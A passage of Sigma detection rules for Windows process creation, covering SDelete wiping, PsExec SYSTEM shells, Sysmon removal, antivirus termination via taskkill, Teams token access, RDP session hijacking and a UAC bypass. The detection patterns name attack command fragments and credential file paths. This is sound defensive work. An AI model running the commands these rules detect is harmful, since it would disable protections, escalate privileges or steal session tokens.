    "content": "title: Potential File Overwrite Via Sysinternals SDelete\nid: a4824fca-976f-4964-b334-0621379e84c4\nstatus: test\ndescription: Detects the use of SDelete to erase a file not the free space\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md\nauthor: frack113\ndate: 2021-06-03\nmodified: 2023-02-28\ntags:\n    - attack.impact\n    - attack.t1485\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName: sdelete.exe\n    filter:\n        CommandLine|contains:\n            - ' -h'\n            - ' -c'\n            - ' -z'\n            - ' /\\?'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml",
    "content": "title: Potential Privilege Escalation To LOCAL SYSTEM\nid: 207b0396-3689-42d9-8399-4222658efc99\nrelated:\n    - id: 8834e2f7-6b4b-4f09-8906-d2276470ee23 # PsExec specific rule\n      type: similar\nstatus: test\ndescription: Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/psexec\n    - https://www.poweradmin.com/paexec/\n    - https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-05-22\nmodified: 2024-03-05\ntags:\n    - attack.resource-development\n    - attack.t1587.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Escalation to LOCAL_SYSTEM\n        CommandLine|contains|windash:\n            # Note that you don't need to add the \".exe\" part when using psexec/paexec\n            # The \"-\" can also be replaced with \"/\"\n            # The order of args isn't important\n            # \"cmd\" can be replaced by \"powershell\", \"pwsh\" or any other console like software\n            - ' -s cmd'\n            - ' -s -i cmd'\n            - ' -i -s cmd'\n            # Pwsh (For PowerShell 7)\n            - ' -s pwsh'\n            - ' -s -i pwsh'\n            - ' -i -s pwsh'\n            # PowerShell (For PowerShell 5)\n            - ' -s powershell'\n            - ' -s -i powershell'\n            - ' -i -s powershell'\n    filter_main_exclude_coverage:\n        # This filter exclude strings covered by 8834e2f7-6b4b-4f09-8906-d2276470ee23\n        CommandLine|contains:\n            - 'paexec'\n            - 'PsExec'\n            - 'accepteula'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Weird admins that rename their tools\n    - Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_sysmon_config_update.yml",
    "content": "title: Sysmon Configuration Update\nid: 87911521-7098-470b-a459-9a57fc80bdfd\nstatus: test\ndescription: Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-09\nmodified: 2024-03-13\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_pe:\n        - Image|endswith:\n              - \\Sysmon64.exe\n              - \\Sysmon.exe\n        - Description: 'System activity monitor'\n    selection_cli:\n        CommandLine|contains|windash: '-c'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrators might use this command to update Sysmon configuration.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_sysmon_uninstall.yml",
    "content": "title: Uninstall Sysinternals Sysmon\nid: 6a5f68d1-c4b5-46b9-94ee-5324892ea939\nstatus: test\ndescription: Detects the removal of Sysmon, which could be a potential attempt at defense evasion\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-11---uninstall-sysmon\nauthor: frack113\ndate: 2022-01-12\nmodified: 2024-03-13\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_pe:\n        - Image|endswith:\n              - \\Sysmon64.exe\n              - \\Sysmon.exe\n        - Description: 'System activity monitor'\n    selection_cli:\n        CommandLine|contains|windash: '-u'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrators might use this command to remove Sysmon for debugging purposes\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_tools_masquerading.yml",
    "content": "title: Potential Binary Impersonating Sysinternals Tools\nid: 7cce6fc8-a07f-4d84-a53e-96e1879843c9\nstatus: test\ndescription: |\n    Detects binaries that use the same name as legitimate sysinternals tools to evade detection.\n    This rule looks for the execution of binaries that are named similarly to Sysinternals tools.\n    Adversary may rename their malicious tools as legitimate Sysinternals tools to evade detection.\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite\nauthor: frack113, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2021-12-20\nmodified: 2025-04-12\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.t1202\n    - attack.t1036.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_exe:\n        Image|endswith:\n            - '\\accesschk.exe'\n            - '\\accesschk64.exe'\n            - '\\AccessEnum.exe'\n            - '\\ADExplorer.exe'\n            - '\\ADExplorer64.exe'\n            - '\\ADInsight.exe'\n            - '\\ADInsight64.exe'\n            - '\\adrestore.exe'\n            - '\\adrestore64.exe'\n            - '\\Autologon.exe'\n            - '\\Autologon64.exe'\n            - '\\Autoruns.exe'\n            - '\\Autoruns64.exe'\n            - '\\autorunsc.exe'\n            - '\\autorunsc64.exe'\n            - '\\Bginfo.exe'\n            - '\\Bginfo64.exe'\n            - '\\Cacheset.exe'\n            - '\\Cacheset64.exe'\n            - '\\Clockres.exe'\n            - '\\Clockres64.exe'\n            - '\\Contig.exe'\n            - '\\Contig64.exe'\n            - '\\Coreinfo.exe'\n            - '\\Coreinfo64.exe'\n            - '\\CPUSTRES.EXE'\n            - '\\CPUSTRES64.EXE'\n            - '\\ctrl2cap.exe'\n            - '\\Dbgview.exe'\n            - '\\dbgview64.exe'\n            - '\\Desktops.exe'\n            - '\\Desktops64.exe'\n            - '\\disk2vhd.exe'\n            - '\\disk2vhd64.exe'\n            - '\\diskext.exe'\n            - '\\diskext64.exe'\n            - '\\Diskmon.exe'\n            - '\\Diskmon64.exe'\n            - '\\DiskView.exe'\n            - '\\DiskView64.exe'\n            - '\\du.exe'\n            - '\\du64.exe'\n            - '\\efsdump.exe'\n            - '\\FindLinks.exe'\n            - '\\FindLinks64.exe'\n            - '\\handle.exe'\n            - '\\handle64.exe'\n            - '\\hex2dec.exe'\n            - '\\hex2dec64.exe'\n            - '\\junction.exe'\n            - '\\junction64.exe'\n            - '\\ldmdump.exe'\n            - '\\listdlls.exe'\n            - '\\listdlls64.exe'\n            - '\\livekd.exe'\n            - '\\livekd64.exe'\n            - '\\loadOrd.exe'\n            - '\\loadOrd64.exe'\n            - '\\loadOrdC.exe'\n            - '\\loadOrdC64.exe'\n            - '\\logonsessions.exe'\n            - '\\logonsessions64.exe'\n            - '\\movefile.exe'\n            - '\\movefile64.exe'\n            - '\\notmyfault.exe'\n            - '\\notmyfault64.exe'\n            - '\\notmyfaultc.exe'\n            - '\\notmyfaultc64.exe'\n            - '\\ntfsinfo.exe'\n            - '\\ntfsinfo64.exe'\n            - '\\pendmoves.exe'\n            - '\\pendmoves64.exe'\n            - '\\pipelist.exe'\n            - '\\pipelist64.exe'\n            - '\\portmon.exe'\n            - '\\procdump.exe'\n            - '\\procdump64.exe'\n            - '\\procexp.exe'\n            - '\\procexp64.exe'\n            - '\\Procmon.exe'\n            - '\\Procmon64.exe'\n            - '\\psExec.exe'\n            - '\\psExec64.exe'\n            - '\\psfile.exe'\n            - '\\psfile64.exe'\n            - '\\psGetsid.exe'\n            - '\\psGetsid64.exe'\n            - '\\psInfo.exe'\n            - '\\psInfo64.exe'\n            - '\\pskill.exe'\n            - '\\pskill64.exe'\n            - '\\pslist.exe'\n            - '\\pslist64.exe'\n            - '\\psLoggedon.exe'\n            - '\\psLoggedon64.exe'\n            - '\\psloglist.exe'\n            - '\\psloglist64.exe'\n            - '\\pspasswd.exe'\n            - '\\pspasswd64.exe'\n            - '\\psping.exe'\n            - '\\psping64.exe'\n            - '\\psService.exe'\n            - '\\psService64.exe'\n            - '\\psshutdown.exe'\n            - '\\psshutdown64.exe'\n            - '\\pssuspend.exe'\n            - '\\pssuspend64.exe'\n            - '\\RAMMap.exe'\n            - '\\RAMMap64.exe'\n            - '\\RDCMan.exe'\n            - '\\RegDelNull.exe'\n            - '\\RegDelNull64.exe'\n            - '\\regjump.exe'\n            - '\\ru.exe'\n            - '\\ru64.exe'\n            - '\\sdelete.exe'\n            - '\\sdelete64.exe'\n            - '\\ShareEnum.exe'\n            - '\\ShareEnum64.exe'\n            - '\\shellRunas.exe'\n            - '\\sigcheck.exe'\n            - '\\sigcheck64.exe'\n            - '\\streams.exe'\n            - '\\streams64.exe'\n            - '\\strings.exe'\n            - '\\strings64.exe'\n            - '\\sync.exe'\n            - '\\sync64.exe'\n            - '\\Sysmon.exe'\n            - '\\Sysmon64.exe'\n            - '\\tcpvcon.exe'\n            - '\\tcpvcon64.exe'\n            - '\\tcpview.exe'\n            - '\\tcpview64.exe'\n            - '\\Testlimit.exe'\n            - '\\Testlimit64.exe'\n            - '\\vmmap.exe'\n            - '\\vmmap64.exe'\n            - '\\Volumeid.exe'\n            - '\\Volumeid64.exe'\n            - '\\whois.exe'\n            - '\\whois64.exe'\n            - '\\Winobj.exe'\n            - '\\Winobj64.exe'\n            - '\\ZoomIt.exe'\n            - '\\ZoomIt64.exe'\n    selection_arm64:\n        Image|endswith:\n            - '\\accesschk64a.exe'\n            - '\\ADExplorer64a.exe'\n            - '\\ADInsight64a.exe'\n            - '\\adrestore64a.exe'\n            - '\\Autologon64a.exe'\n            - '\\Autoruns64a.exe'\n            - '\\autorunsc64a.exe'\n            - '\\Clockres64a.exe'\n            - '\\Contig64a.exe'\n            - '\\Coreinfo64a.exe'\n            - '\\Dbgview64a.exe'\n            - '\\disk2vhd64a.exe'\n            - '\\diskext64a.exe'\n            - '\\DiskView64a.exe'\n            - '\\du64a.exe'\n            - '\\FindLinks64a.exe'\n            - '\\handle64a.exe'\n            - '\\hex2dec64a.exe'\n            - '\\junction64a.exe'\n            - '\\LoadOrd64a.exe'\n            - '\\LoadOrdC64a.exe'\n            - '\\logonsessions64a.exe'\n            - '\\movefile64a.exe'\n            - '\\notmyfault64a.exe'\n            - '\\notmyfaultc64a.exe'\n            - '\\pendmoves64a.exe'\n            - '\\pipelist64a.exe'\n            - '\\procdump64a.exe'\n            - '\\procexp64a.exe'\n            - '\\Procmon64a.exe'\n            - '\\PsExec64a.exe'\n            - '\\psfile64a.exe'\n            - '\\PsGetsid64a.exe'\n            - '\\PsInfo64a.exe'\n            - '\\pskill64a.exe'\n            - '\\psloglist64a.exe'\n            - '\\pspasswd64a.exe'\n            - '\\psping64a.exe'\n            - '\\PsService64a.exe'\n            - '\\pssuspend64a.exe'\n            - '\\RAMMap64a.exe'\n            - '\\RegDelNull64a.exe'\n            - '\\ru64a.exe'\n            - '\\sdelete64a.exe'\n            - '\\sigcheck64a.exe'\n            - '\\streams64a.exe'\n            - '\\strings64a.exe'\n            - '\\sync64a.exe'\n            - '\\Sysmon64a.exe'\n            - '\\tcpvcon64a.exe'\n            - '\\tcpview64a.exe'\n            - '\\vmmap64a.exe'\n            - '\\whois64a.exe'\n            - '\\Winobj64a.exe'\n            - '\\ZoomIt64a.exe'\n    filter_valid:\n        - Company:\n              - 'Sysinternals - www.sysinternals.com'\n              - 'Sysinternals'\n        - Product|startswith: 'Sysinternals'\n    filter_empty:\n        - Company: null\n        - Product: null\n    condition: 1 of selection_* and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysprep_appdata.yml",
    "content": "title: Sysprep on AppData Folder\nid: d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e\nstatus: test\ndescription: Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)\nreferences:\n    - https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets\n    - https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-06-22\nmodified: 2021-11-27\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\sysprep.exe'\n        CommandLine|contains: '\\AppData\\'\n    condition: selection\nfalsepositives:\n    - False positives depend on scripts and administrative tools used in the monitored environment\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_systeminfo_execution.yml",
    "content": "title: Suspicious Execution of Systeminfo\nid: 0ef56343-059e-4cb6-adc1-4c3c967c5e46\nstatus: test\ndescription: Detects usage of the \"systeminfo\" command to retrieve information\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-1---system-information-discovery\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo\nauthor: frack113\ndate: 2022-01-01\nmodified: 2022-07-14\ntags:\n    - attack.discovery\n    - attack.t1082\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\systeminfo.exe'\n        - OriginalFileName: 'sysinfo.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml",
    "content": "title: Potential Signing Bypass Via Windows Developer Features\nid: a383dec4-deec-4e6e-913b-ed9249670848\nrelated:\n    - id: b110ebaf-697f-4da1-afd5-b536fa27a2c1\n      type: similar\nstatus: test\ndescription: Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.\nreferences:\n    - Internal Research\n    - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-11\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\SystemSettingsAdminFlows.exe'\n        - OriginalFileName: 'SystemSettingsAdminFlows.EXE'\n    selection_flag:\n        CommandLine|contains: 'TurnOnDeveloperFeatures'\n    selection_options:\n        CommandLine|contains:\n            - 'DeveloperUnlock'\n            - 'EnableSideloading'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_takeown_recursive_own.yml",
    "content": "title: Suspicious Recursive Takeown\nid: 554601fb-9b71-4bcc-abf4-21a611be4fde\nstatus: test\ndescription: Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/takeown\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md#atomic-test-1---take-ownership-using-takeown-utility\nauthor: frack113\ndate: 2022-01-30\nmodified: 2022-11-21\ntags:\n    - attack.defense-evasion\n    - attack.t1222.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\takeown.exe'\n        CommandLine|contains|all:\n            - '/f '\n            - '/r'\n    condition: selection\nfalsepositives:\n    - Scripts created by developers and admins\n    - Administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_tapinstall_execution.yml",
    "content": "title: Tap Installer Execution\nid: 99793437-3e16-439b-be0f-078782cf953d\nstatus: test\ndescription: Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques\nreferences:\n    - https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers\nauthor: Daniil Yugoslavskiy, Ian Davis, oscd.community\ndate: 2019-10-24\nmodified: 2023-12-11\ntags:\n    - attack.exfiltration\n    - attack.t1048\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\tapinstall.exe'\n    filter_optional_avast:\n        Image|contains:\n            - ':\\Program Files\\Avast Software\\SecureLine VPN\\'\n            - ':\\Program Files (x86)\\Avast Software\\SecureLine VPN\\'\n    filter_optional_openvpn:\n        Image|contains: ':\\Program Files\\OpenVPN Connect\\drivers\\tap\\'\n    filter_optional_protonvpn:\n        Image|contains: ':\\Program Files (x86)\\Proton Technologies\\ProtonVPNTap\\installer\\'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate OpenVPN TAP installation\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_tar_compression.yml",
    "content": "title: Compressed File Creation Via Tar.EXE\nid: 418a3163-3247-4b7b-9933-dcfcb7c52ea9\nstatus: test\ndescription: |\n    Detects execution of \"tar.exe\" in order to create a compressed file.\n    Adversaries may abuse various utilities to compress or encrypt data before exfiltration.\nreferences:\n    - https://unit42.paloaltonetworks.com/chromeloader-malware/\n    - https://lolbas-project.github.io/lolbas/Binaries/Tar/\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage\nauthor: Nasreddine Bencherchali (Nextron Systems), AdmU3\ndate: 2023-12-19\ntags:\n    - attack.collection\n    - attack.exfiltration\n    - attack.t1560\n    - attack.t1560.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\tar.exe'\n        - OriginalFileName: 'bsdtar'\n    selection_create:\n        CommandLine|contains:\n            - '-c'\n            - '-r'\n            - '-u'\n    condition: all of selection_*\nfalsepositives:\n    - Likely\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_tar_extraction.yml",
    "content": "title: Compressed File Extraction Via Tar.EXE\nid: bf361876-6620-407a-812f-bfe11e51e924\nstatus: test\ndescription: |\n    Detects execution of \"tar.exe\" in order to extract compressed file.\n    Adversaries may abuse various utilities in order to decompress data to avoid detection.\nreferences:\n    - https://unit42.paloaltonetworks.com/chromeloader-malware/\n    - https://lolbas-project.github.io/lolbas/Binaries/Tar/\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage\nauthor: AdmU3\ndate: 2023-12-19\ntags:\n    - attack.collection\n    - attack.exfiltration\n    - attack.t1560\n    - attack.t1560.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\tar.exe'\n        - OriginalFileName: 'bsdtar'\n    selection_extract:\n        CommandLine|contains: '-x'\n    condition: all of selection_*\nfalsepositives:\n    - Likely\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_taskkill_sep.yml",
    "content": "title: Taskkill Symantec Endpoint Protection\nid: 4a6713f6-3331-11ed-a261-0242ac120002\nstatus: test\ndescription: |\n    Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\n    Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\n    As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\nreferences:\n    - https://www.exploit-db.com/exploits/37525\n    - https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection\n    - https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer\nauthor: Ilya Krestinichev, Florian Roth (Nextron Systems)\ndate: 2022-09-13\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'taskkill'\n            - ' /F '\n            - ' /IM '\n            - 'ccSvcHst.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_tasklist_module_enumeration.yml",
    "content": "title: Loaded Module Enumeration Via Tasklist.EXE\nid: 34275eb8-fa19-436b-b959-3d9ecd53fa1f\nstatus: test\ndescription: |\n    Detects the enumeration of a specific DLL or EXE being used by a binary via \"tasklist.exe\".\n    This is often used by attackers in order to find the specific process identifier (PID) that is using the DLL in question.\n    In order to dump the process memory or perform other nefarious actions.\nreferences:\n    - https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/\n    - https://pentestlab.blog/tag/svchost/\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-02-12\nmodified: 2024-03-13\ntags:\n    - attack.t1003\n    - attack.credential-access\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\tasklist.exe'\n        - OriginalFileName: 'tasklist.exe'\n    selection_flags:\n        CommandLine|contains|windash: '-m'\n    selection_module:\n        # Note: add other interesting modules or binaries\n        CommandLine|contains: 'rdpcorets.dll'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_taskmgr_localsystem.yml",
    "content": "title: Taskmgr as LOCAL_SYSTEM\nid: 9fff585c-c33e-4a86-b3cd-39312079a65f\nstatus: test\ndescription: Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-03-18\nmodified: 2022-05-27\ntags:\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n        Image|endswith: '\\taskmgr.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_taskmgr_susp_child_process.yml",
    "content": "title: New Process Created Via Taskmgr.EXE\nid: 3d7679bd-0c00-440c-97b0-3f204273e6c7\nstatus: test\ndescription: Detects the creation of a process via the Windows task manager. This might be an attempt to bypass UAC\nreferences:\n    - https://twitter.com/ReneFreingruber/status/1172244989335810049\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-03-13\nmodified: 2024-01-18\ntags:\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\taskmgr.exe'\n    filter_main_generic:\n        Image|endswith:\n            - ':\\Windows\\System32\\mmc.exe'\n            - ':\\Windows\\System32\\resmon.exe'\n            - ':\\Windows\\System32\\Taskmgr.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Administrative activity\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml",
    "content": "title: Potentially Suspicious Command Targeting Teams Sensitive Files\nid: d2eb17db-1d39-41dc-b57f-301f6512fa75\nstatus: test\ndescription: |\n    Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams.\n    The database might contain authentication tokens and other sensitive information about the logged in accounts.\nreferences:\n    - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/\n    - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens\nauthor: '@SerkinValery'\ndate: 2022-09-16\nmodified: 2023-12-18\ntags:\n    - attack.credential-access\n    - attack.t1528\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - '\\Microsoft\\Teams\\Cookies'\n            - '\\Microsoft\\Teams\\Local Storage\\leveldb'\n    filter_main_legit_locations:\n        Image|endswith: '\\Microsoft\\Teams\\current\\Teams.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml",
    "content": "title: New Virtual Smart Card Created Via TpmVscMgr.EXE\nid: c633622e-cab9-4eaa-bb13-66a1d68b3e47\nstatus: test\ndescription: Detects execution of \"Tpmvscmgr.exe\" to create a new virtual smart card.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/security/identity-protection/virtual-smart-cards/virtual-smart-card-tpmvscmgr\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-15\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\tpmvscmgr.exe'\n        OriginalFileName: 'TpmVscMgr.exe'\n    selection_cli:\n        CommandLine|contains: 'create'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage by an administrator\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_tscon_localsystem.yml",
    "content": "title: Suspicious TSCON Start as SYSTEM\nid: 9847f263-4a81-424f-970c-875dab15b79b\nstatus: test\ndescription: Detects a tscon.exe start as LOCAL SYSTEM\nreferences:\n    - http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html\n    - https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6\n    - https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-03-17\nmodified: 2022-05-27\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n        Image|endswith: '\\tscon.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_tscon_rdp_redirect.yml",
    "content": "title: Suspicious RDP Redirect Using TSCON\nid: f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb\nstatus: test\ndescription: Detects a suspicious RDP session redirect using tscon.exe\nreferences:\n    - http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html\n    - https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6\n    - https://www.hackingarticles.in/rdp-session-hijacking-with-tscon/\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-03-17\nmodified: 2023-05-16\ntags:\n    - attack.lateral-movement\n    - attack.t1563.002\n    - attack.t1021.001\n    - car.2013-07-002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: ' /dest:rdp-tcp#'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_tscon_rdp_session_hijacking.yml",
    "content": "title: Potential RDP Session Hijacking Activity\nid: 224f140f-3553-4cd1-af78-13d81bf9f7cc\nstatus: test\ndescription: Detects potential RDP Session Hijacking activity on Windows systems\nreferences:\n    - https://twitter.com/Moti_B/status/909449115477659651\nauthor: '@juju4'\ndate: 2022-12-27\nmodified: 2024-12-01\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\tscon.exe'\n        - OriginalFileName: 'tscon.exe'\n    selection_integrity:\n        IntegrityLevel:\n            - 'System'\n            - 'S-1-16-16384'\n    condition: all of selection_*\nfalsepositives:\n    - Administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml",
    "content": "title: UAC Bypass Using ChangePK and SLUI\nid: 503d581c-7df0-4bbe-b9be-5840c0ecc1fc\nstatus: test\ndescription: Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)\nreferences:\n    - https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b\n    - https://github.com/hfiref0x/UACME\n    - https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-23\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\changepk.exe'\n        ParentImage|endswith: '\\slui.exe'\n        IntegrityLevel:\n            - 'High'\n            - 'System'\n            - 'S-1-16-16384' # System\n            - 'S-1-16-12288' # High\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml",
